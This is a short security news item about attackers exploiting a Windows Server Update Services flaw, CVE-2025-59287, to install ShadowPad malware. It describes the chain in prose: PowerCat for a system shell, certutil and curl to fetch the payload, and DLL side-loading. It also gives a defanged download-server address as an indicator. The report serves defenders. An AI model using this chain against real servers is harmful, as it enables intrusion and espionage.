A recent security flaw in Microsoft Windows Server Update Services (WSUS), identified as CVE-2025-59287, has been exploited by cybercriminals to distribute ShadowPad malware. The attackers specifically targeted Windows Servers with WSUS enabled, gaining initial access through the critical deserialization vulnerability that allows remote code execution with system privileges. AhnLab Security Intelligence Center reported that the attackers utilized PowerCat, an open-source PowerShell utility, to obtain a system shell and subsequently downloaded ShadowPad using tools like certutil and curl. ShadowPad, which emerged in 2015 and is considered a successor to PlugX, is a modular backdoor linked to Chinese state-sponsored hacking groups. The malware is known for its stealth and capability to load additional plugins from embedded shellcode into memory. The method of installation involves DLL side-loading, using a legitimate binary to execute a malicious DLL payload. As a result, it employs various anti-detection mechanisms and persistence techniques. The exploitation of CVE-2025-59287 has gained momentum since proof-of-concept code for the vulnerability became publicly available. AhnLab highlighted the severity of the issue, emphasizing that it allows attackers to conduct reconnaissance and drop legitimate tools alongside ShadowPad. The specific external server used for downloading the malware was identified as "149.28.78[.]189:42306." The rapid weaponization of this vulnerability underscores the ongoing threat landscape surrounding vulnerable WSUS instances.